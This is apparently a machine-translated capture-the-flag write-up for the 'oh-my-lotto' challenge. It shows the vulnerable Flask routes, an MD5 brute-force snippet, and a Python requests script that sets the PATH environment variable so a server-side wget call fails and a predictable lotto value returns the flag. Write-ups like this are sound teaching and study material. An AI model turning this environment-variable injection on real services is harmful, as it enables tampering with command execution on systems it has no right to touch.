oh-my-lotto

 Knowledge point ： Change the environment variable to bypass wget

md5 Blast

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '0c5fbf':
        print(i)
        print(a)

The key is three routes .

result route , Returns a value given by him , That's what we're going to predict .

@app.route("/result", methods=['GET'])
def result():

    if os.path.exists("/app/lotto_result.txt"):
        lotto_result = open("/app/lotto_result.txt", 'rb').read().decode()
    else:
        lotto_result = ''
    
    return render_template('result.html', message=lotto_result)

forecast route , Mainly used to upload files .

@app.route("/forecast", methods=['GET', 'POST'])# Route for uploading files 
def forecast():

    message = ''
    if request.method == 'GET':
        return render_template('forecast.html')
    elif request.method == 'POST':
        if 'file' not in request.files:
            message = 'Where is your forecast?'
            
        file = request.files['file']
        file.save('/app/guess/forecast.txt')
        message = "OK, I get your forecast. Let's Lotto!"
        return render_template('forecast.html', message=message)

lotto route , This is what we can get flag The place of , When the predicted value is the same as the given value this time, it will return flag.

@app.route("/lotto", methods=['GET', 'POST'])
def lotto():
    message = ''

    if request.method == 'GET':# If the reference is GET Go to lotto page 
        return render_template('lotto.html')

    elif request.method == 'POST':# If the reference is post Then continue 
        flag = os.getenv('flag')# Get the value of the environment variable , If not, return to the meeting none, If it exists, return the key value 
        lotto_key = request.form.get('lotto_key') or ''
        lotto_value = request.form.get('lotto_value') or ''# Get form values 
        try:
            lotto_key = lotto_key.upper()# Convert lowercase letters to uppercase 
        except Exception as e:
            print(e)
            message = 'Lotto Error!'
            return render_template('lotto.html', message=message)
        
        if safe_check(lotto_key):
            os.environ[lotto_key] = lotto_value
            try:
                # From the intranet lotto Get a random value 
                os.system('wget --content-disposition -N lotto')

                if os.path.exists("/app/lotto_result.txt"):# Judge whether the file exists 
                    lotto_result = open("/app/lotto_result.txt", 'rb').read()# Open and read 
                else:
                    lotto_result = 'result'# If the file does not exist, it will be assigned directly result
                if os.path.exists("/app/guess/forecast.txt"):# Upload files locally 
                    forecast = open("/app/guess/forecast.txt", 'rb').read()
                else:
                    forecast = 'forecast'

                if forecast == lotto_result:# If we predict the content and Intranet lotto_result.txt If the content is the same, return flag
                    return flag
                else:
                    message = 'Sorry forecast failed, maybe lucky next time!'
                    return render_template('lotto.html', message=message)
            except Exception as e:
                message = 'Lotto Error!'
                return render_template('lotto.html', message=message)
                
        else:
            message = 'NO NO NO, JUST LOTTO!'
            return render_template('lotto.html', message=message)

There are three steps ：

 1.  First visit lotto page .
 2.  Revisit result page , Get the value he gives .
 3.  Change the environment variable to PATH, Revisit lotto page .

analysis ：
The first two steps are to get the current value , But next time the value will change , So you can't get flag 了 , How can we control the value to be constant or change the value ？

The third step is to control the random value of the intranet .
reason ：
You can see that we can control the name and value of environment variables .

if safe_check(lotto_key):
	os.environ[lotto_key] = lotto_value
	try:
        # From the intranet lotto Get a random value 
        os.system('wget --content-disposition -N lotto')

PATH Variable is used to save the directory path that can be searched , If the program to be run is not in the current directory , The operating system can search in turn PATH The directory recorded in the variable , If you find a program to run in these directories , The operating system can run directly , The premise is to have execution permission .

That is, we control the environment variables PATH, So he can't find wget command , that wget --content-disposition -N lotto An error will be reported, resulting in the termination of the program ,/app/lotto_result.txt The content has always been the first visit , The randomly generated value .

import requests
url = "http://127.0.0.1:8880/"

def lotto(key,value):
    data = {
    "lotto_key": key,
            "lotto_value": value}
    txt=requests.post(url + "lotto",data=data).text
    print(txt)

def getResult():
    txt=requests.get(url+"result").text
    p=txt.split("<p>")[-1].split("</p>")[0]
    print(p)
    return p

lotto("","")
result= {
    "file":getResult()}# Get predictions 
requests.post(url + "forecast",files=result)# Upload predicted values 
lotto("PATH","xxxx")

Reference resources ：
one
two